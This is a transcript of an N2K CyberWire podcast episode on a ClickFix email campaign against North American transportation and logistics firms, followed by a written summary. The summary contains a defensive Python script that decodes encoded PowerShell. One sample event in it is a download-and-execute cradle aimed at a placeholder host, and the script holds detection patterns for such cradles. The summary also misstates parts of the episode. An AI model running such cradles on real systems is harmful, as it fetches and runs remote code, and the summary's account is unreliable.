![Whispers in the wires: A closer look at the new age of intrusion. [OMITB] — Hacking Humans cover](https://megaphone.imgix.net/podcasts/fd2b62ae-9ae4-11ef-950f-cbef6c04f373/image/d9f0cdb0dcdd515f0dfd92da4cc68fb2.png?ixlib=rails-4.3.1&max-w=3000&max-h=3000&fit=crop&auto=format,compress)
Dave Bittner
You're listening to the Cyberwire network, powered by N2K.
Rick Howard
It was a cold, cold night when we got together. A cold, cold, rainy night. I've seen it all in this line of work. The grifters, the hustlers, the two bit fishers pulling cons over coffee shop wifi. But this. This was different. This wasn't some small time scam. This was malware. Slick, silent and deadly. My office smelled of stale coffee and burnt out firewalls. The only light spilling in from the monitor in the corner. Rick and Selina appeared, faces lit by their own monitors, each looking as worn out as I felt. Rick was holding a flash drive, giving me that look, like he'd just seen a ghost. Selena, meanwhile, was scrolling through lines of code, her expression hard, determined. I leaned in. This wasn't your average malware case. This was something else. It lurked in the corners, stayed quiet and patient. The kind of code that doesn't just steal data. It aims to unravel things from the inside. They didn't need to say much. The message was clear enough. In our world, the threats keep getting smarter. All you can do is try to stay one step ahead, even when it feels like the game is rigged. And just like that, I knew I was in deep. This case wasn't just any old breach. This was war. And it was about to get messy.
Dave Bittner
Sa.
Selena Larson
Dave, are you coughing because you had too many dips before recording this?
Rick Howard
I can neither confirm nor deny.
Unknown
I can confirm it.
Selena Larson
Well, now that the cooler weather's coming, is it switching from dip season to soup season or warm dips? Warm dip season.
Dave Bittner
I mean, there's a fine line between a hot soup and a warm dip. I think it's a matter of viscosity, but anything that you can put. You can take either a chip or a bit of bread and put it in. I'm totally fine considering that to be a dip. So. Yes.
Unknown
So soupsies are subset of dips is what you just described to us. I love that.
Dave Bittner
Soups are just dips with very low viscosity. That's all.
Unknown
It's all.
Dave Bittner
Yeah. That's fine. Sure.
Selena Larson
Well, on that note, one really interesting piece of research that we worked on recently was this cluster of activity that was specifically targeting transportation and logistics companies in North America. It ended up delivering a variety of different malware payloads. But what I thought was the most interesting was that it's a really fantastic example of threat actors being pretty creative in terms of their delivery methods. So in this case, they were compromising legitimate senders. Compromising real accounts.
Unknown
And then actually is there ever an instance where they compromise illegitimate accounts? Just, you know, just wondering.
Rick Howard
Ah, Rick, always asking the hard hitting questions.
Selena Larson
You know, I wonder. Yeah, a hacker hacking a hacker to send to reply to some threat. Hijacked emails. Yes, it's like hackerception.
Dave Bittner
Wouldn't that be though? Like we hear these stories about like malware operators, you know, at apt groups who go in, they get in there and the first thing they do is clean out all the other malware so that it's only theirs. It's theirs.
Unknown
So making room from theirs. Everybody out, everybody out of the pool, right?
Dave Bittner
Well there was, there was, I remember someone talking about, it was like an industrial control system situation where the operator like knew who was in his system, but they did such a good job of cleaning everything else out that they were like, you know what, I'm going to let them be here for a.
Rick Howard
Little while.
Unknown
Instead of paying a third party to, you know, monitor all that. Yeah, let's let this guy do it, you know.
Dave Bittner
Yeah.
Selena Larson
I mean, eyes on cleaning house. You know, I could see it, I could see it happening. But yeah, but in this case, so they did compromise the legitimate senders and then they replied to existing conversations within that inbox to make the messages actually look legitimate. So it's kind of interesting because there were two parts to this. This was the first part where, instead of impersonating transportation or logistics companies, they really compromised those accounts and then tried to make it seem quite legitimate. Now the second part, what made this kind of interesting, was later on in their campaigns they started using what we're calling a ClickFix technique. So essentially what happens is the target will receive this pop-up or notification of some sort, depending on what the actual attack chain is, and it'll be like, oh, you've encountered an issue. Click here to fix this. And what that actually does is copy and paste base64-encoded PowerShell. So the actor is pretending like, hey, here's this security issue, but here's how you can fix it. But fixing it actually ends up leading to the compromise.
Unknown
So Dave, here we go. You know, we've been doing this for a very long time and it all comes down to clicking the link.
Rick Howard
Clicking the link. It's a simple mistake, like falling for a pretty face in a smoky bar. I've been there. Heck, we all have. One click and you're in over your head. Just like I was when I trusted a source that turned out to be as crooked as a geriatric kangaroo.
Unknown
Okay, that... is that the entire attack chain?
Dave Bittner
Yeah, Selena, you know, Rick doesn't mind clicking suspicious links. He figures what's the worst they can do? Fax me a virus?
Unknown
Those deadly fax viruses.
Dave Bittner
Ooh. Rick thinks that multifactor authentication is clicking the link twice.
Unknown
Wait, I'm gonna write that down. That is not what it. Shoot.
Dave Bittner
Yeah. Rick falls for scam so quickly, even the Nigerian princes say, wow, that was easy.
Unknown
I want a first-name basis with all those Nigerian princes.
Dave Bittner
Yeah, yeah. Rick has a. I guess it's best to call it an open relationship with all of his passwords. So tell us about this, Selena. What exactly goes into this click fix method? Because I, I've, I've heard about this making the rounds and there's some unique, particularly clever elements of this. Right?
Selena Larson
Yeah. So we initially have seen it from multiple different threat actors. They might be doing fake update delivery where it'll pop up and say, oh, you've encountered a problem with Chrome. Click here to fix it. We've also seen it delivered via email where there will be an HTML document that says, you've encountered a problem with Word. Click here to fix it. But what was really interesting about this particular attack chain was that the HTML actually popped up with software that would be used in the course of normal operations for transportation and logistics companies. So they impersonated software called Samsara, AMB Logistic, Astra TMS. Basically this would only be used in transport and fleet operations management. So in addition to having that identity compromise, they also appeared to know some of the information that would be used in the course of normal operations, how it might be used by the people that they were targeting. So they were really very clever in a full-scale impersonation that, if you're an unsuspecting recipient, is a very compelling social engineering technique.
Unknown
So that indicates that they were in their victim's network for a long time, learning about all these software packages that most of us had never heard of. Right. So the question I have, Selena, is what was the entry? How did they get in? You were mentioning they got in through email. Was that the victim zero, compromising email accounts, or is there something more scary going on here?
Selena Larson
So from what we understand, we saw the visibility as the initial access via email. But to your point, whether it was that they had compromised some of these organizations and done the research first, or whether they were just familiar with those business practices and done a lot of open source intelligence gathering, you know, looking up what software might be used, investigating various organizations or, you know, what are common practices for this specific type of company? They did do quite a bit of investigation. And this goes back to this idea of criminals needing to do a lot more research, development, trying to be a lot more creative with their delivery methods. Because we as cyber defenders and our industry as a whole and enterprises at large, you know, we have gotten better at security. And so the response to that from threat actors is, I have to be more compelling with my lures, with my social engineering. One of the things that I think is really fun about the ClickFix technique is it'll say, hey, here's a problem, but you can solve it yourself, right? So how many times are we so frustrated going to IT, running into an issue and being like, oh my gosh, I can't access this document or I can't download this software, you know, what have you, open an IT ticket, work with IT to try and fix it. But with ClickFix, it says, oh, you can do this yourself. Just click this button. And most people would have no idea that it was copying and pasting and then running PowerShell on their host. Right, like so it's very clever being like, you can fix it yourself.
Dave Bittner
The one that would work on Rick would just say, you got mail.
Unknown
Well, I think it's pretty tricky about all this is they're running an action here that is typically associated with criminals. You know, click this link basically to get something done. But the intelligence that they had to have to make something like that work is, would lead me to believe the attribution is towards some government. So what are your team, what is your team saying about that, Selena?
Selena Larson
So we don't actually attribute this to a tracked threat actor. However, given the actual malware payloads, which is really interesting, they were just kind of commodity stealers. NetSupport RAT, DanaBot, things that we see typically with cybercrime threat actors and not really very sophisticated malware. So that was really interesting too. And I think also part of this overall story where we're looking at and learning that the landscape, including cyber criminals, are getting a lot better and a lot more clever at the initial delivery, but they're not spending quite as much time or development on the malware. They might just be using something commodity or, you know, an RMM tool, something like that, to actually install that payload. So it does seem pretty interesting and quite clever and they are doing a lot of research. But the ultimate payload is something that we see oftentimes with high-volume commodity cyber criminal threat actors.
Unknown
Well, Selena, regardless of which side it comes from, either nation state or cyber criminal, malware is nothing but trouble.
Dave Bittner
Selena, I'm curious. Why do you suppose that they chose transportation and logistics companies? Is there anything special about them or were they just convenient?
Rick Howard
I knew I needed to start asking the hard hitting questions, otherwise this case was going to take forever and we were running out of time.
Selena Larson
That is a great question. We don't really know the motivation, but I do think it speaks to something interesting about targeting supply chain. So oftentimes, you know, you're doing quite a bit of business and conversation and interactions and payments and a lot of traffic, basically, between suppliers and the organizations that work with them. And so it could be a very interesting wealth of information. It could have a lot of people that they're going to be doing business with, which could potentially lead to a lot more compromises or additional victims. Or it just could be a case of the threat actor having some sort of knowledge or understanding or interest in this particular vertical itself. So again, you know, the use of a very specific, tailored ClickFix using that software combined with the very specific targeting indicates that yes, they had done their research, but also maybe they were just potentially interested in this specific vertical. So we are continuing to monitor it. But I did find it really interesting and it does kind of have all of those hallmarks of stuff that we like to talk about in security. Right? So identity compromise, supplier risk, you know, ClickFix and social engineering and being very convincing. So it was really all of these hallmarks of stuff that we as security practitioners talk about all the time. And this was just bundled in a nice little package of, oh, this is a really terrific example of how threat actors can be very clever and crafty and get you to do what they want.
Unknown
Something that all the things you just outlined there, there's malware always has a price to pay, even if we don't know exactly what it is, is a.
Rick Howard
Price to pay, to say the least. It's always at the forefront of my mind.
Selena Larson
Stay tuned. There's more to come after the break.
Dave Bittner
One of the things that the brief mentions that caught my eye was that the threat actors are purchasing infrastructure from third parties. I'm curious, what are your insights there? I mean, why would they be doing that?
Selena Larson
So this is actually an attack chain that we've seen, or similar attack chains that we've seen, from other entities across the landscape. So because it wasn't necessarily specific to this one cluster, we do believe that they are likely purchasing it from a third party. And because of the similarities that we've seen from other potential chains, that wasn't quite as sophisticated, wasn't super specifically targeted. But another thing to kind of think about is, as the threat landscape is shifting to try and be a lot more creative, the sellers are also seeing how they can really differentiate themselves in the marketplace. So can I create something that is really compelling, that can be an attack chain, or can I be an operator and sell this to a lot of different users? So I'm making the money off of just the delivery mechanism as opposed to creating really sophisticated, interesting malware that's going to be sold for a super high price. So it's honestly kind of interesting to think about it from a potential market shift perspective as well, where, you know, the investing in the tools and resources for the cybercriminals to be able to go to that marketplace and buy these new tools or leverage them or subscribe. Right. Infrastructure as a service, potentially, as opposed to historically what we, you know, see oftentimes is really cool malware, very customized, sophisticated implants or rootkits or things like that, where that tends to be a lot of the focus. So both from a financial resources perspective, but also time and investment perspective, I think it is pretty interesting. And to be clear, you know, Proofpoint ourselves as researchers doesn't have a ton of visibility into these marketplaces. But based off of open source research and other reporting done by many of our colleagues, it is really interesting to kind of see what that marketplace is like now.
Also, in addition, the shift away from remote access tools to more information stealers, or the use of legitimate services like remote management and monitoring tools, there's been kind of a big change in the landscape and that sort of has a trickle-down economic impact, if you will, on the dark marketplaces and various exploit forums.
Unknown
Selena Reagan. Selena Reagan. That's what we are. But Selena, you, you mentioned supply chain attacks and one of the reasons they like to do that is because that traffic most of the time looks normal, right? Until it's not normal and then you know, chaos happens and then you know, bum, bum, bum, it's horrible. So that's kind of the reason they do it that way, right?
Rick Howard
Normal, That's a funny word in this line of work. Normal means something's hiding in plain sight like a snake in the grass just waiting for you to take that first wrong step. And trust me, you never see it coming.
Selena Larson
You have inherent trust in the supply chain. So right, like these are people, individuals and companies that you're regularly talking to, you're regularly sending money to and from, you're regularly having this previously established trust and communications set up. And so that can be something that's very easily exploitable by various threat actors. I mean, we see it within email compromise all the time, right? So impersonating suppliers, saying, oh, our bank account information needs to be changed or updated. Having these, you know, very creative and crafty customized lures with a domain that's, you know, potentially one letter off of the legitimate company, but they're pretending to be or impersonating these suppliers across the supply chain. So whether it's, you know, an outright compromise of a supplier that is doubly preying on that trust, or if you're just impersonating a supplier that the person regularly engages with, regardless, you have that sort of first step into building that trust with the recipient. And that's why they can be so compelling and very effective when it comes to social engineering and impersonation to try and get someone to either click on something, download something, you know, do something very bad.
Unknown
So are you saying that we don't know what the ultimate objective was for these transportation kinds of companies? Do we not know what they got?
Selena Larson
So we, like, you know, from our perspective, we just see the initial access and the delivery of the information stealers or the DanaBot or, you know, NetSupport RAT. But based off of what we know about these types of malware, it likely is financially motivated. So some type of stealing either data or money to ultimately make money in.
Unknown
The end, is there any thought that that might be a camouflaged operation so that some nation state could get in and get access to transportation systems?
Dave Bittner
Misdirection.
Unknown
Misdirection. That's what I would do. Okay. If I was doing this right?
Dave Bittner
Yeah. Yeah. This is coming from Rick, by the way, who once got scammed into buying antivirus software for his microwave oven, ladies and gentlemen.
Unknown
And since I bought that, I have never had a piece of malware found on my microwave.
Dave Bittner
There you go. See?
Selena Larson
Or when you microwave anything, it just tends to be a little less cooked than it should be. No, nothing that we've seen that necessarily indicates that. Just based off of sort of the volume, the regularity, the different types of organizations that are compromised in the malware that's being delivered. I do think it is pretty interesting though. And you know, we are continuing to monitor this, so our assessment may change. Right? I mean, that's the beauty of threat intelligence.
Unknown
Typical. Typical intel, Right, Right.
Dave Bittner
There's a big old asterisk just sitting there, right? Just throbbing. It's a throbbing asterisk. This may all change. Please don't hold us to anything.
Unknown
We have moderate confidence in this.
Dave Bittner
This is our current understanding. But please read the fine print. Oh, spoiler alert. It's all fine print. Oh my.
Selena Larson
It wouldn't be cyber threat intelligence without it. "It depends."
Rick Howard
I couldn't have said it more perfectly even if I tried.
Dave Bittner
It's interesting to me how much they front loaded things here. Like as you say, it seems to me like they put most of their energy into the front end of getting in, of establishing trust, of simulating these known platforms and then once they were in there, they were just using off the shelf tools to do what they.
Rick Howard
Needed to do then.
Dave Bittner
But it was really the time effort, expense was into that initial access. Is that accurate?
Selena Larson
Yeah, absolutely. And you know, we kind of joke and laugh about, you know, espionage versus cybercrime and could this be. But I do think it is kind of an interesting conversation to be had where there is right now an evolution and an increase in sophistication from cyber criminal threat actors where they will spend a lot of money and time and resources into developing that initial access where historically we could. Oh, sorry, there's a.
Unknown
It fits right in with our film noir ghost.
Selena Larson
My house is haunted. I apologize. That was my friendly ghost screaming as it walked by my office.
Rick Howard
Don't look at me. I have no idea what that was.
Selena Larson
But yeah, so it does kind of fit as part of this overall trend in the landscape where we're seeing this investment in time, energy, resources into the initial access. They're being a lot more creative, a lot more sophisticated in developing some of the, you know, like Dave, you explained front loading the attack chain, but are.
Unknown
They doing, are they trying to develop exploit code or they're going in through social engineering because exploit code's expensive.
Selena Larson
Yeah, so that's, you know, that's a great point. From, at least from the email as an initial access perspective, it is very much an investment in social engineering and new attack chains. So it's not necessarily developing the exploits themselves. We have seen occasionally the use of some zero-days or n-days. As soon as something drops, you know, they're very, very quickly adopted into these overall attack chains. But it does kind of bring up this interesting conversation where historically we have had this bias in cybersecurity where espionage APT actors are the ones that are the most sophisticated. They're the ones that are going to be the most clever and crafty and they are, you know, the people that are investing a lot into those resources. Whereas, you know, cybercrime used to just, you know, deliver a malicious attachment, or here's a malicious link. But now, you know, there's a lot of overlap in TTPs between espionage and cybercriminal threat actors. There's a lot more sort of creativity and investigation and time going into attempts to exploit people. You know, I love thinking about how people are getting creative with social engineering. I mean, the ClickFix thing, I think, was really a very, very clever social engineering feat. Right. Getting someone to think that they know best and to do something and actually infecting themselves. I mean, how clever? Right. And so that's why we see it being used so much now. It started off a little bit slow, but, oh, wow, wait, this is actually really effective. People like fixing stuff themselves and they don't have to talk to IT, where, you know, focus on a little bit kind of like the human psychology aspect of it as well, where threat actors have to think about how is a person going to respond to this. Right. Like we're increasingly trained as human beings and people to not just click on something. So we're not just going to click on something that's obviously malicious anymore.
We're not just going to download something because someone tells us to.
Unknown
You clearly haven't talked to anybody in my family. Right.
Selena Larson
So as a whole, in general, everyone besides Rick.
Unknown
Oh, no, I click on them all the time too. So I'm a poor example.
Selena Larson
Yeah, the sort of like human psychology. Right. Like, if we think about, like the Hercule Poirot of cyber investigations, the little gray cells and the human psychology, you know, how can we, how can we use that?
Rick Howard
Hercule Poirot, we had one word for someone like that, and that word was chump.
Selena Larson
To both better educate people, but also from a threat actor perspective, you know, how can I use my little gray cells to get someone to click on something or engage with something that they otherwise wouldn't? It's interesting to see that sort of whole evolution. But then of course, we are the good guys and have to figure out and be creative with our defense and to prevent it. We'll be right back.
Dave Bittner
Well, let's talk about mitigations.
Rick Howard
Let's bring it home then.
Dave Bittner
What are the recommendations here for folks to best protect themselves?
Selena Larson
Yeah. So I think if we're talking about it being a very human sort of targeted threat, it definitely has to be a human-educated response; human awareness, I think, plays a really big role here. So I think, you know, especially when we're talking about stuff that looks legitimate and people essentially infecting themselves, it's so, so important for organizations to really educate users on this new technique. Also, I think it's really helpful to remind folks that even if they are engaging with someone or they're receiving something from somebody, even if they'd previously talked to them, if it seems out of place or if it's a file or an attachment type that you don't typically receive. So for example, this was an Internet shortcut URL file in many cases, or an HTML with an embedded Internet shortcut or URL file. Like it kind of makes you go, huh? And really realize that the threat actors are being a lot more crafty. So we have to be a lot more mindful in terms of how we are thinking about and educating our users about common techniques used by a lot of these threat actors. And you know, I think it can be a little bit difficult to defend against some of this stuff because so much of it can be legitimate, or you're essentially infecting yourself by copying and pasting to run PowerShell. And so a lot of it is just kind of user awareness and reporting.
Unknown
Let's be specific here. Right. As a general rule, don't install anything unless you know the other person online that sent it to you.
Selena Larson
Oh, absolutely.
Unknown
Right. And so that would solve 80% of this. Right. The other one I always give to my family and friends is never do your day to day operation running as an administrator to your laptop or your phone. Right. That would also clear up about 90% of this stuff. Right. So those two things would keep you out of a lot of hot water. Dave, you like the hot water, so maybe not do that.
Rick Howard
Yes, I do.
Dave Bittner
I actually spend way too much time in my hot tub. I am a wrinkled mess is a.
Selena Larson
Hot tub, if not just a non-viscous dip.
Rick Howard
No, it's chewing soup.
Unknown
Not even callback. That's what it is. That is very good.
Dave Bittner
That's right, that's right. But Rick, I mean, to what you just said there, don't install anything where you don't know the sender. That was part of what this was about, right? They were convincing the people that this was a known entity, that this is, oh, nothing to see here. This is software that you're familiar with, and even more so, this is niche software that only those of us who are in this special club even know about.
Unknown
So yeah, it's easier to say than do. Okay, I totally hear what you're saying that, you know, this is a professional social engineering attack. But the first thing anybody should do when presented with an email from what looks like the IT department is to pick up the phone and say, hey, you guys, are you sure this is what you want me to do? Because I'm an idiot about this stuff.
Selena Larson
Yeah. I mean, even from, like, that side, though, like, restricting or flagging when an unusual file type is received. Right. So something like a URL file, it could be potentially used in legitimate enterprise operations, but you're probably not sending those back and forth all that often. So, you know, things like that, too, where you can have some of these access restrictions or file restrictions on individual users to kind of prevent a little bit of that. But, yeah, I mean, trust no one.
Unknown
Trust no one.
Dave Bittner
Poor Rick. When they get Rick on the line after he's given them his credit card number, he says, hey, why don't I give you my Social Security number just in case. Just in case you need it. It might save you a call later. Let me just give that to you.
Unknown
I don't wanna do this twice.
Dave Bittner
No.
Selena Larson
Well, that's Rick's way of making sure that he's so secure, is that all threat actors have access to any of his potential data, and so none of them even try to go after him because they know everyone else can, too.
Unknown
I'm an open book.
Dave Bittner
That's true. Rick's passwords are so old, they come with an AARP discount. All right, anything else we want to cover here, Selena, before we wrap up?
Selena Larson
I mean, I think we pretty much hit on all of it. And if I would leave anything to, you know, to our listeners is to just be very mindful and think about how we can better educate and be aware of the increasing craftiness of many of these very sophisticated cyber criminal threat actors. Because, you know, they're not going anywhere. And we. We as defenders, also have to match their craftiness and creativeness to make sure that we're staying ahead of the curve.
Unknown
For you, Dave, that means just closing the laptop and walking away.
Dave Bittner
That's right. And right now I'm going to walk away. I. Waiting in the other room is a whipped ricotta with lemon and olive oil dip. So I'm going to go partake in that. Thank you both. This was great fun as always. We'll see you next time.
Unknown
Thanks, guys. See you later.
Selena Larson
Thank you.
Rick Howard
And just like that, case closed. But in cyberspace, nothing really ever dies. It just waits, hiding in plain sight, ready to strike again. Like an old tuna sandwich in the back of the office fridge. You don't see it coming, but when it hits, it hits hard. Well, I guess there's nothing left to do for this old gumshoe but to read the closing credits. And that's Only Malware in the Building, brought to you by N2K CyberWire. In a digital world where malware lurks in the shadows, we bring you the stories and strategies to stay one step ahead of the game. As your trusty digital sleuth, we're unraveling the mysteries of cybersecurity, always keeping the bad guys one step behind. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the ever-evolving world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. This episode was produced by Liz Stokes, mixing and sound design by Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben, our executive editor, Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher. I'm Dave Bittner. On behalf of Rick Howard and Selena Larson, thanks for listening. Stay safe out.
Podcast Summary: Hacking Humans – "Whispers in the Wires: A Closer Look at the New Age of Intrusion"
Release Date: November 5, 2024
Host/Authors: N2K Networks
Description: Exploring deception, influence, and social engineering within the realm of cybercrime.
In the episode titled "Whispers in the Wires: A Closer Look at the New Age of Intrusion," hosts Dave Bittner, Rick Howard, and Selena Larson delve into the evolving landscape of cyber threats, particularly focusing on sophisticated intrusion techniques targeting transportation and logistics companies in North America. The discussion sheds light on creative malware delivery methods, social engineering tactics, and the shifting strategies of cybercriminals in response to enhanced security measures.
Selena Larson [03:12]:
"One really interesting piece of research... targeting transportation and logistics companies... Compromising legitimate senders... make the messages actually look legitimate."
The episode opens with Selena Larson introducing a recent cluster of cyber activities aimed at North American transportation and logistics firms. Unlike typical small-scale scams, this operation utilizes advanced malware designed not just to steal data but to disrupt operations from within.
Selena Larson [03:12 - 06:08]:
Selena explains that threat actors compromised legitimate email accounts at these companies and used them to send malicious payloads that appear authentic. Because the messages come from a real, trusted sender, recipients are far more likely to act on them. She introduces the ClickFix technique, in which targets receive a seemingly legitimate notification prompting them to click a link to resolve a fabricated problem. Following the prompt ends with base64-encoded PowerShell running on the victim's machine, leading to system compromise.
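The chain summarized above ends with base64-encoded PowerShell executing on the endpoint, which is the point where a defender's process-creation telemetry (EDR, Sysmon) can catch it. The script below is an added example, not code from the podcast, Proofpoint, or N2K: it triages command lines for powershell.exe's encoded-command switch, decodes the UTF-16LE/base64 payload so analysts can read what actually ran, and flags generic indicators (download cradles, hidden windows, policy bypass). The sample events, the `placeholder.invalid` host and the indicator list are constructed for this example.

```python
import base64
import re

# Common spellings of powershell.exe's -EncodedCommand switch. powershell.exe accepts
# any unambiguous prefix; this covers the forms usually seen in telemetry (assumption).
ENCODED_SWITCH = re.compile(
    r"(?<!\S)-(?:encodedcommand|encoded|enc|en|ec|e)\s+(\S+)", re.IGNORECASE
)

# Generic detection-engineering patterns, matched against the raw command line
# (minus the opaque blob) and the decoded script. Constructed list, not from the page.
INDICATORS = {
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I
    ),
    "dynamic execution": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(?:xecutionpolicy)?p?\s+bypass", re.I),
    "nested encoding": re.compile(r"frombase64string", re.I),
}


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token: str):
    """Return the decoded script, or None if the token is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze_event(cmdline: str) -> dict:
    """Triage one process command line from a process-creation log."""
    match = ENCODED_SWITCH.search(cmdline)
    encoded = match is not None
    decoded = None
    scan_text = cmdline
    indicators = []
    if encoded:
        token = match.group(1)
        decoded = decode_encoded_command(token)
        # Scan the command line without the base64 blob, plus the decoded script,
        # so indicator regexes never fire on base64 noise.
        scan_text = cmdline.replace(token, "")
        if decoded is None:
            indicators.append("undecodable encoded command")
        else:
            scan_text += "\n" + decoded
    for name, pattern in INDICATORS.items():
        if pattern.search(scan_text):
            indicators.append(name)
    return {
        "cmdline": cmdline,
        "encoded": encoded,
        "decoded": decoded,
        "indicators": indicators,
        "suspicious": bool(indicators),
    }


# Constructed payload for the sample; the host is a reserved placeholder name.
CONSTRUCTED_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/fix.ps1')"
)

# Constructed sample events (not real telemetry): command lines of the kind a Sysmon
# Event ID 1 or EDR process-creation record carries. The third mimics a ClickFix launch.
SAMPLE_EVENTS = [
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
    "powershell.exe -enc " + encode_powershell("Get-Date"),
    "powershell.exe -w hidden -ep bypass -enc " + encode_powershell(CONSTRUCTED_PAYLOAD),
    "powershell.exe -EncodedCommand not-base64!!",
]


def triage(events):
    """Analyze a list of command lines and return one verdict dict per event."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag}] {r['cmdline'][:60]}")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
        if r["indicators"]:
            print("    indicators:", ", ".join(r["indicators"]))
```

An encoded command on its own is not treated as malicious (administrators use it legitimately, as the `Get-Date` event shows); the verdict comes from what the decoded script does plus the launch flags around it, and a blob that will not decode is escalated rather than silently dropped.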
Notable Quote [06:19] Rick Howard:
"Clicking the link. It's a simple mistake, like falling for a pretty face in a smoky bar."
The conversation underscores the pivotal role of human error in cybersecurity breaches. Rick and an unidentified speaker humorously highlight common mistakes, such as clicking suspicious links or mishandling multifactor authentication prompts, that can open the door to significant compromise.
Selena Larson [07:19]:
"They did do quite a bit of investigation... criminals needing to do a lot more research, development, trying to be a lot more creative with their delivery methods."
Selena emphasizes the increasing creativity and research invested by cybercriminals to bypass improved security measures, particularly through tailored social engineering tactics that exploit human psychology.
Selena Larson [12:47]:
"What motivation, but I do think it speaks to something interesting about targeting supply chain... could have a wealth of information."
The hosts discuss why transportation and logistics companies are prime targets. Selena suggests that compromising these entities can provide access to a wealth of information due to their extensive interactions with suppliers and partners, potentially leading to broader network penetrations.
Selena Larson [15:20]:
"They are likely purchasing it from a third party... creating something really compelling... remote management and monitoring tools... trickle down economic impact on the dark marketplaces."
The episode explores how threat actors are increasingly purchasing infrastructure and tools from third-party marketplaces instead of developing bespoke malware. This shift allows for greater scalability and cost-effectiveness, as cybercriminals leverage readily available resources to execute sophisticated attacks.
Selena Larson [26:38 - 30:19]:
Selena provides actionable recommendations for protecting against such threats.
Notable Quote [28:08] Unknown Speaker:
"Don't install anything unless you know the other person online that sent it to you."
The episode wraps up with a reflection on the evolving tactics of cybercriminals, who are investing more in the initial phases of attacks—particularly in gaining access—while utilizing off-the-shelf tools for payload delivery. This strategic shift indicates a blurring line between cybercriminal and nation-state tactics, highlighting the need for continuous adaptation in defense mechanisms.
Selena Larson [31:03]:
"As defenders, we also have to match their craftiness and creativeness to make sure that we're staying ahead of the curve."
The discussion underscores the importance of proactive and adaptive cybersecurity measures, emphasizing the role of human vigilance and advanced defense strategies to counter increasingly sophisticated threats.
"Whispers in the Wires" effectively illustrates the dynamic and intricate nature of modern cyber intrusions, particularly in niche sectors like transportation and logistics. By dissecting the methods and motivations behind these attacks, the hosts provide valuable insights into the current threat landscape and offer practical guidance for individuals and organizations striving to bolster their cybersecurity defenses.
Notable Closing Quote [31:52] Rick Howard:
"In cyberspace, nothing really ever dies. It just waits, hiding in plain sight, ready to strike again."
Stay Informed:
To remain protected against such evolving threats, continuous education, robust security protocols, and proactive threat intelligence are imperative. For more insights and updates on cybersecurity strategies, subscribe to the "Hacking Humans" podcast by N2K Networks.